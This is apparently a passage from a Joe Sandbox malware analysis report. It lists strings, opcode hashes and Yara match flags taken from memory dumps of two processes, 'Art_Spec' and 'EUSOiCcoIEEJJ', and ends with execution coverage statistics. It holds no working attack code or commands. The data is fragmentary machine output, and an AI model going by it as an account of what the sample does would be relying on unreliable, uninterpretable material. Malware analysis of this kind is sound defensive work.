                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        Strings
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01424655
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014246FC
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01424787
                                                        • Execute=1, xrefs: 01424713
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01424742
                                                        • ExecuteOptions, xrefs: 014246A0
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01424725
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$[$]:%u
                                                        • API String ID: 48624451-2819853543
                                                        Strings
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014202E7
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014202BD
                                                        • RTL: Re-Waiting, xrefs: 0142031E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        Strings
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01427B7F
                                                        • RTL: Re-Waiting, xrefs: 01427BAC
                                                        • RTL: Resource at %p, xrefs: 01427B8E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0142728C
                                                        Strings
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01427294
                                                        • RTL: Re-Waiting, xrefs: 014272C1
                                                        • RTL: Resource at %p, xrefs: 014272A3
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280
                                                        APIs
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0143CFBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: CallFilterFunc@8
                                                        • String ID: @$@4Cw@4Cw
                                                        • API String ID: 4062629308-3101775584
                                                        • Opcode ID: 6001caa91a27a8e3b0280732b7e7341388d8d3f73a1963e15bc0c2447d547301
                                                        • Instruction ID: 05a6fb899e12bb1e458dccec4419dd2104abdee034f94a9747c970772526e518
                                                        • Opcode Fuzzy Hash: 6001caa91a27a8e3b0280732b7e7341388d8d3f73a1963e15bc0c2447d547301
                                                        • Instruction Fuzzy Hash: C0419EB1900215DFCB219FA9C840AAEFBB8FF99B58F51402FE904DB264E734D801CB61
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c7628efe74a26828ca57720f1b355a266732c1ecc3df20125fa4e14f020b909f
                                                        • Instruction ID: b10f907e5ded0c161f03ae7e72696ef5a0bf5cecc4e51ebb59df9e305d195f1c
                                                        • Opcode Fuzzy Hash: c7628efe74a26828ca57720f1b355a266732c1ecc3df20125fa4e14f020b909f
                                                        • Instruction Fuzzy Hash: 8E31D511A583F14ED30E836D08B9A75AFC18F5724174EC2EEDADA6F2F3C4848419D3A5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: {$#$$Z$%?$&-$'f$'o$/Z$1b$66$7O$;)$=Z$=k$?\$@-$B]$Dd$Ey$H1$NA$O$Qd$Qh$T&$V$V/$Z.$[h$^K$_N$`U$`a$c%$d$g@$j$l$q)$qb$u$u$w"$w5$~;$W$e$s
                                                        • API String ID: 0-1375048673
                                                        • Opcode ID: 8eb2207ac221af48023aee3f930bbbcc3d13958e9f9cb6075b88a2aed5f76d02
                                                        • Instruction ID: a3e3ab6ed69e42105c6cfeab4d00547ac9d84f3e5e62c5d76e5d2f28457ecfaf
                                                        • Opcode Fuzzy Hash: 8eb2207ac221af48023aee3f930bbbcc3d13958e9f9cb6075b88a2aed5f76d02
                                                        • Instruction Fuzzy Hash: 39729BB0D05629CBEB65CF45C8987DDBBB1BB48308F1085D9C10E7B290D7BA6A88DF45
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$O$S$\$s
                                                        • API String ID: 0-3854637164
                                                        • Opcode ID: aa6c9d7937143d569e0f548cfa3c1a0e0d8bc48a816d17ea97ecee67788804a5
                                                        • Instruction ID: 83c62c80a67b4f3954623f6335eb0f5e8b5385ea0bd6aac4ae9ef7103b4a5b39
                                                        • Opcode Fuzzy Hash: aa6c9d7937143d569e0f548cfa3c1a0e0d8bc48a816d17ea97ecee67788804a5
                                                        • Instruction Fuzzy Hash: 9441F772D00119BBDB10EF94DD48EEAB3F8EB84718F008559ED08A7101E776BA549BE1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "
                                                        • API String ID: 0-3847333454
                                                        • Opcode ID: 0818a829163c7660c2f5b42bf689f5b1fd462d0a620ac56f005babb2b4334f58
                                                        • Instruction ID: 587e7aacc2ee2c230b00574496ef8261af7d5149cf907f4a246497e4c7a85d8b
                                                        • Opcode Fuzzy Hash: 0818a829163c7660c2f5b42bf689f5b1fd462d0a620ac56f005babb2b4334f58
                                                        • Instruction Fuzzy Hash: 9E1100B6D0121CAF9B40DFE9DC419EEBBF8EF58214F04456AE91AF7200E7745A048BA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: f?
                                                        • API String ID: 0-3289969635
                                                        • Opcode ID: 0c350a499c5a2e42597a84862848742d39529a815448d8b8c4f2502d582a421f
                                                        • Instruction ID: fe486e745d3d39f029bc2fe3811aa1a8e103d69babcdc7c418e514cec6979430
                                                        • Opcode Fuzzy Hash: 0c350a499c5a2e42597a84862848742d39529a815448d8b8c4f2502d582a421f
                                                        • Instruction Fuzzy Hash: 3201E9B2D11219AFDB40DFE8C9409EEBBF9BF18214F14456AD91AF3200E7746B048BA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                        • API String ID: 0-3248090998
                                                        • Opcode ID: 1f8b8abbbbf1e3cd1e12fded52264a9c050109948fa5ce36f3251e5f8e1be36a
                                                        • Instruction ID: 2d654923b89ba7f16a08580d7e5374abbaee57f5e5783f9c5f8a809b22342837
                                                        • Opcode Fuzzy Hash: 1f8b8abbbbf1e3cd1e12fded52264a9c050109948fa5ce36f3251e5f8e1be36a
                                                        • Instruction Fuzzy Hash: 7091FFF08052A98ECB118F55A5603DEBF71BB95204F1581EDC6AA7B243C3BE4E85DF90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                        • API String ID: 0-3236418099
                                                        • Opcode ID: d53dc7dae281fef825b7a20cc6d9c4976643420f64786eddb8e9e5e4bbab50f6
                                                        • Instruction ID: 2aa5e4e358d00ec14494106d5ba66fc787ddb9a92adc392afb9ed49e9890cafc
                                                        • Opcode Fuzzy Hash: d53dc7dae281fef825b7a20cc6d9c4976643420f64786eddb8e9e5e4bbab50f6
                                                        • Instruction Fuzzy Hash: 349163B1900218AAEB10EF94CC81FEE77B9BF54708F0445ADE608B6141EB756F89DF61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 7f6f78bae4700dae1273215cc052f2d4df15a67024cef2cd11a7ac8ee6107261
                                                        • Instruction ID: 802a6e9151a76c4d5b60424ac4bed22fe45bc831c48d746375e56ddd0c03cef0
                                                        • Opcode Fuzzy Hash: 7f6f78bae4700dae1273215cc052f2d4df15a67024cef2cd11a7ac8ee6107261
                                                        • Instruction Fuzzy Hash: CB7151B1D00218AAEF15EF94CC40FEEB7BDBF44708F04459DE609BA140EB756B489B95
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                        • API String ID: 0-392141074
                                                        • Opcode ID: 9fcc275b16f0f271e4a0af19f1968f53018017527680e9ec55a5f1c0716e9830
                                                        • Instruction ID: 5688cb4b0c5221084f8715bb91c140567ab25dc0a7922f70b41dfd463dd01fd2
                                                        • Opcode Fuzzy Hash: 9fcc275b16f0f271e4a0af19f1968f53018017527680e9ec55a5f1c0716e9830
                                                        • Instruction Fuzzy Hash: 0A6151B1D00218AAEF25DFA4CC40FEEB7B9BF08308F04459DE609B6181EB756B489F55
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                        • API String ID: 0-2356907671
                                                        • Opcode ID: 320b3e7b12be722899e2148baaf47b58793bdce683fb3b6fd03083f58a0331e1
                                                        • Instruction ID: 1eecb8ac984308ca024f830e23f25f6d972127fc714d9b5047015121b9e171ed
                                                        • Opcode Fuzzy Hash: 320b3e7b12be722899e2148baaf47b58793bdce683fb3b6fd03083f58a0331e1
                                                        • Instruction Fuzzy Hash: 408187B2C003186AEF51EBA4CC81FEF73BDAF54708F044899B509B6141EA756B58EF61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                        • API String ID: 0-685823316
                                                        • Opcode ID: 6ad6f890f39681a1522870b12b5ecb80e26a319f8752f5a13a466ae04c9d78a4
                                                        • Instruction ID: 24420dddbbf6ef82779903c68caefb5f0ce3544cce42883bf9876cd724c5a4bd
                                                        • Opcode Fuzzy Hash: 6ad6f890f39681a1522870b12b5ecb80e26a319f8752f5a13a466ae04c9d78a4
                                                        • Instruction Fuzzy Hash: F73178B1D51218AAEF50DFD4CC45BEEBBB9AF44708F04815CE618BA180DBB52648CBA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: :$:$:$A$I$N$P$m$s$t
                                                        • API String ID: 0-2304485323
                                                        • Opcode ID: 1e8e826f36fab50eeda812c013d92c34440ce050c58ce4fc5a40db548288060a
                                                        • Instruction ID: 6e1964bdc0da10aab647a4ec2ebb773a80904ff0441d51f5619bd8afd200dc9f
                                                        • Opcode Fuzzy Hash: 1e8e826f36fab50eeda812c013d92c34440ce050c58ce4fc5a40db548288060a
                                                        • Instruction Fuzzy Hash: 92D1DAB1A00215AFDB10EFA4CD85FEEB7F8BF48308F04491DE659A6140EB79F9059B61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: L$S$\$a$c$e$l
                                                        • API String ID: 0-3322591375
                                                        • Opcode ID: 39a8e789279ce5572e4b501cd2f5725856788531bb5185dea0c50e4361333bcd
                                                        • Instruction ID: 7e439a73cb30ac5f62bfecfc86280aa5251ba9ce9c1c3eea162ec77236658ef3
                                                        • Opcode Fuzzy Hash: 39a8e789279ce5572e4b501cd2f5725856788531bb5185dea0c50e4361333bcd
                                                        • Instruction Fuzzy Hash: 8641A372C10218AADF50EFA4DC84AEEB7F8EF48314F05865ED809B7110EB7169819BD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$,$6$C$a$c$t
                                                        • API String ID: 0-57574274
                                                        • Opcode ID: fc7786ad9086a2070782595f3e69e192bfb1185de6e34e4aa1b80cc2c2708a63
                                                        • Instruction ID: 6b1bd44a1f7f2f79ed8d003b884318f5dc6e153683aa95c2e49ed29be830664a
                                                        • Opcode Fuzzy Hash: fc7786ad9086a2070782595f3e69e192bfb1185de6e34e4aa1b80cc2c2708a63
                                                        • Instruction Fuzzy Hash: 1511AC20D082CEDDDB12C7BC84187EEBF715B12214F0886D9D9A12B2C2D2BA5755D7A6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: F$P$T$f$r$x
                                                        • API String ID: 0-2523166886
                                                        • Opcode ID: 387a5b2b52e0ff5e8ae2c8ad664a9df6c6255b3d2c86f74190555daec4922255
                                                        • Instruction ID: c158ce6c8ef9317c99af35e1e47627d84783a93292eab6b702b2ae6181e878f0
                                                        • Opcode Fuzzy Hash: 387a5b2b52e0ff5e8ae2c8ad664a9df6c6255b3d2c86f74190555daec4922255
                                                        • Instruction Fuzzy Hash: 62510770900304AAEB30EFA5CD45BEAB7F8FF4431CF044A5DA58976180D7BABA84DB51
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: F$P$T$f$r$x
                                                        • API String ID: 0-2523166886
                                                        • Opcode ID: af1ced19f4f400ec674e182d8db03c11c5d674918c81501b8d13d3cd880eb3a5
                                                        • Instruction ID: 4aabdf09fdcf3011791e9c0aeb58f401c3101c5b9ae72126863464e25ac6535e
                                                        • Opcode Fuzzy Hash: af1ced19f4f400ec674e182d8db03c11c5d674918c81501b8d13d3cd880eb3a5
                                                        • Instruction Fuzzy Hash: 30F0A4B1D10218AADF20DFA9C909ADFBFB5FF45358F11825DD8147B200E7BA5A09CB91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $i$l$o$u
                                                        • API String ID: 0-2051669658
                                                        • Opcode ID: 116b3b7242c56609d79cebe4d338456272df7ab4a0279181cf7646a5c4a69351
                                                        • Instruction ID: d64c9a20618533b3468be2ceff2b6daa5408e09c622dfb067b896dae7d9b5f07
                                                        • Opcode Fuzzy Hash: 116b3b7242c56609d79cebe4d338456272df7ab4a0279181cf7646a5c4a69351
                                                        • Instruction Fuzzy Hash: 5D6150B1A00304AFDB64DFA4CD80FEFB7F9AB88714F10495DE559A7240E735BA418B60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $i$l$o$u
                                                        • API String ID: 0-2051669658
                                                        • Opcode ID: 9e4e991e4492956ac726d94c50b11d0a26535f214ceb5b1f2698dbc76302a624
                                                        • Instruction ID: 63b77193484b4623bff21330edf7dfc59bff9f479d014e8a4f907f4fef279ab5
                                                        • Opcode Fuzzy Hash: 9e4e991e4492956ac726d94c50b11d0a26535f214ceb5b1f2698dbc76302a624
                                                        • Instruction Fuzzy Hash: 3D411EB1A00308AFDB60EFA4CD84FEFBBF9AB48704F10495DE559A7240D775AA418B60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 1$3$7$9$N
                                                        • API String ID: 0-3501087661
                                                        • Opcode ID: e850785c1f55a783ce02cb035e0e0e9b559b609883e2dd08b83e483d8d5a385b
                                                        • Instruction ID: 760c5711b21510e73719ff97acb2ed9a02981776bad6077c77f2af593345d46e
                                                        • Opcode Fuzzy Hash: e850785c1f55a783ce02cb035e0e0e9b559b609883e2dd08b83e483d8d5a385b
                                                        • Instruction Fuzzy Hash: 603141B1910109BBEF10DF94CD41BEE77F8BF48308F048599E908B7240E676AE459BE5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                        • API String ID: 0-2877786613
                                                        • Opcode ID: a6d7b6eb5af04526e3a8dd96f55bd149529a700559cba304474225568ee30be8
                                                        • Instruction ID: f16bdfcc53e2e8dbf5da261b16a1fba86e36449250970222f365df2958596a22
                                                        • Opcode Fuzzy Hash: a6d7b6eb5af04526e3a8dd96f55bd149529a700559cba304474225568ee30be8
                                                        • Instruction Fuzzy Hash: 28413DB15111187EEB11EBE0CC42FEF77BCAF55708F048448FA447A180EB756B1597A6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                        • API String ID: 0-2877786613
                                                        • Opcode ID: e702ba951ea7bbe6f5e04749598195cb1437089433bade041a45160a57a426a8
                                                        • Instruction ID: 7ac4cad1f04de7c7394f9f2729461d35a6157500ce16a9daeff7c2688bba9ffb
                                                        • Opcode Fuzzy Hash: e702ba951ea7bbe6f5e04749598195cb1437089433bade041a45160a57a426a8
                                                        • Instruction Fuzzy Hash: 18312DB15121187AEB11EBA0CC42FEF77BCAF55708F408448FA447A180EB757F45A7A6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $e$k$o
                                                        • API String ID: 0-3624523832
                                                        • Opcode ID: 6f5c7f93c5c407d6a2e1146690628310ff3e76f6b342f0bf9dc6b732020cdc12
                                                        • Instruction ID: 89dc939773ec3266a5e1c4d84273141f8de3069b745765a2736021b6ad8a00e5
                                                        • Opcode Fuzzy Hash: 6f5c7f93c5c407d6a2e1146690628310ff3e76f6b342f0bf9dc6b732020cdc12
                                                        • Instruction Fuzzy Hash: F811A9B1900208ABDF14DF94D8C4ADEBBF5FF44314F048509E9056B201E771E945CBA0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, Offset: 03D30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3d30000_EUSOiCcoIEEJJ.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $e$k$o
                                                        • API String ID: 0-3624523832
                                                        • Opcode ID: a81e565eb4bcf9ce83e0d49b25d6eaa29db8a5601191523d86992eb8eb7932fd
                                                        • Instruction ID: e047d908dae637dafb953ded762c916388f322ca2c450c71f59f226e0e6a62a9
                                                        • Opcode Fuzzy Hash: a81e565eb4bcf9ce83e0d49b25d6eaa29db8a5601191523d86992eb8eb7932fd
                                                        • Instruction Fuzzy Hash: DE0184B2900218ABDB14DF99D884ADEB7F9FF48718F048619E9196B201E771E945CBA0

                                                        Execution Graph

                                                        Execution Coverage:2.6%
                                                        Dynamic/Decrypted Code Coverage:4.2%
                                                        Signature Coverage:1.5%
                                                        Total number of Nodes:452
                                                        Total number of Limit Nodes:75
